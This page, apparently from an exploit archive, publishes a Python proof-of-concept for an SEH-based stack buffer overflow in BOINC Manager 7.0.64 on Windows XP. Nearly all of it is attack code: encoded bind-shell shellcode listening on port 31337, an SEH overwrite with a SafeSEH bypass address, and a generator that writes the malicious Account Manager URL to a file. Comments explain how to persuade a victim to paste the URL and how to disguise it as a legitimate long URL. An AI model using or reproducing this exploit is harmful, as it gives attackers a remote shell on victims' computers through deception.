[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BOINC Manager (Seti@home) 7.0.64 Field SEH based BOF
# Published : 2013-06-02
# Author :
# Previous Title : Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit
# Next Title : AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass


# Exploit Title: BOINC Manager 7.0.64 Field stack based buffer overflow
# Date: 26.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://boinc.berkeley.edu/  
# Software Link: http://boinc.berkeley.edu/dl/boinc_7.0.64_windows_intelx86.exe
# Version: 7.0.64 for Windows
# Tested on: Windows XP SP3 Eng (32bits)
#
#
#BOINC 7.0.64 Windows x86 (used by Seti@HOME) Manager Field stack based buffer overflow - SEH based
#
#BOINC is a program that lets you donate your idle computer time to science projects like
#SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others. 
#
#In order to exploit  the vulnerability the attacker must convince the victim to use the very long URL as Account Manager URL.
#This URL is generated by the exploit into the exploit.txt file. If it dosnt work on the first time - give it one more try. 
#The victim must follow:
#
#Add project -> Use account manager -> Account Manager URL
#
#As with all Field BOF the severity is rather low but hey watch the movie and read below
#
#http://www.youtube.com/watch?v=H9Hz8OPWjtM&feature=youtu.be
#
#Developers team @ berkley.edu was informed about the issue and released the BOINC 7.1.3 version including the fix within a week timeframe.




#windows/shell/bind_tcp EXITFUNC=thread LPORT=31337 R | msfencode -e x86/alpha_upper -t c
shellcode = (
"x89xe6xdbxdfxd9x76xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4cx49x35x50"
"x33x30x35x50x55x30x4cx49x4ax45x56x51x4ex32x35"
"x34x4cx4bx51x42x30x30x4cx4bx31x42x44x4cx4cx4b"
"x56x32x32x34x4cx4bx43x42x56x48x54x4fx4fx47x50"
"x4ax57x56x36x51x4bx4fx36x51x39x50x4ex4cx47x4c"
"x33x51x33x4cx53x32x46x4cx47x50x39x51x38x4fx44"
"x4dx45x51x4fx37x4dx32x4cx30x46x32x31x47x4cx4b"
"x46x32x42x30x4cx4bx30x42x47x4cx55x51x58x50x4c"
"x4bx31x50x34x38x4dx55x39x50x33x44x51x5ax55x51"
"x4ex30x50x50x4cx4bx30x48x52x38x4cx4bx56x38x51"
"x30x35x51x49x43x4dx33x47x4cx37x39x4cx4bx56x54"
"x4cx4bx55x51x4ex36x46x51x4bx4fx30x31x39x50x4e"
"x4cx49x51x38x4fx44x4dx45x51x48x47x56x58x4dx30"
"x44x35x5ax54x55x53x53x4dx4bx48x57x4bx43x4dx46"
"x44x43x45x4dx32x46x38x4cx4bx56x38x56x44x43x31"
"x4ex33x35x36x4cx4bx54x4cx50x4bx4cx4bx30x58x45"
"x4cx35x51x58x53x4cx4bx53x34x4cx4bx35x51x38x50"
"x4bx39x51x54x56x44x37x54x51x4bx51x4bx33x51x56"
"x39x31x4ax50x51x4bx4fx4dx30x46x38x51x4fx30x5a"
"x4cx4bx42x32x5ax4bx4dx56x31x4dx45x38x47x43x57"
"x42x45x50x33x30x45x38x54x37x54x33x46x52x31x4f"
"x31x44x52x48x30x4cx32x57x57x56x53x37x4bx4fx4e"
"x35x4fx48x5ax30x35x51x35x50x53x30x47x59x38x44"
"x30x54x36x30x53x58x51x39x4bx30x32x4bx43x30x4b"
"x4fx39x45x36x30x36x30x36x30x50x50x51x50x46x30"
"x47x30x56x30x42x48x4bx5ax54x4fx59x4fx4bx50x4b"
"x4fx59x45x4ax37x36x51x49x4bx51x43x53x58x43x32"
"x33x30x33x4ax55x39x4dx59x4ax46x52x4ax42x30x36"
"x36x30x57x42x48x38x42x59x4bx50x37x53x57x4bx4f"
"x39x45x30x53x50x57x55x38x4ex57x4ax49x47x48x4b"
"x4fx4bx4fx59x45x46x33x56x33x50x57x52x48x43x44"
"x5ax4cx47x4bx4dx31x4bx4fx38x55x30x57x4dx47x42"
"x48x42x55x42x4ex30x4dx35x31x4bx4fx39x45x32x4a"
"x53x30x43x5ax34x44x36x36x56x37x42x48x35x52x58"
"x59x49x58x51x4fx4bx4fx39x45x4cx4bx36x56x32x4a"
"x57x30x52x48x33x30x32x30x43x30x55x50x56x36x42"
"x4ax55x50x43x58x50x58x39x34x56x33x4dx35x4bx4f"
"x39x45x4ax33x56x33x43x5ax35x50x46x36x46x33x50"
"x57x42x48x43x32x49x49x58x48x31x4fx4bx4fx58x55"
"x45x51x58x43x51x39x4fx36x4cx45x5ax56x42x55x5a"
"x4cx58x43x41x41")



urlstart="http://boinc.unex.es/extremadurathome?longurl="
#Pre and Post - play with them to make them look like a valid long URL (some nice examples from google apps are out there)
pre="C"*(1292-46)
nseh="xEBx06x43x43"
#XP sp 3 32bit Eng 0x018f1d3a : popad # call ebp |  {PAGE_READWRITE} space outside of loaded modules to bypass safeseh
NOP="x43x43"
seh="x3ax1dx8fx01"
post="C"*5000


buffer = urlstart + pre + nseh + seh + NOP + shellcode + post

print(buffer)

file = open('exploit.txt','w')
file.write(buffer)
file.close()